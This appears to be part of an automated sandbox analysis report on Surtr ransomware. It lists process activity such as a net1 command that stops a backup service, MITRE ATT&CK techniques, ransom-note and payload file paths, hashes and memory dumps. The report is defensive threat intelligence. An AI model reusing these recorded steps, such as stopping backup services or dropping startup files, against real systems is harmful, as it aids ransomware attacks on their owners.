C:\Windows\system32\net1 stop "BackupExecManagementService"
1⤵
PID:3840

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 9a19d7013666995a0670b0b25c56077f 9BC1rJC06k+5TJbrMbgHig.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:3452

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
d59759bc778a19e80bf1478c15c179bf

SHA1
aad4cb4b5af1afe54d041d8473839131e7f30cfe

SHA256
c043a532f046dd234d14f452eee8daea36c32e7390bb44e01a68c6ce566dd0da

SHA512
33d4a9e5920076cb03f96e19f0a31233a3e8cc4feed9d8b4b8a4fe7e9abc7c141d447c166a8335ec8e0b170b01290ffeeba483ae8158628d0c756e445a2b7775

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Download Submit
C:\ProgramData\Service\Surtr.exe

Download Submit
memory/3436-130-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/3436-131-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download
memory/3436-138-0x0000000140000000-0x0000000140161000-memory.dmp

Filesize
1.4MB

Download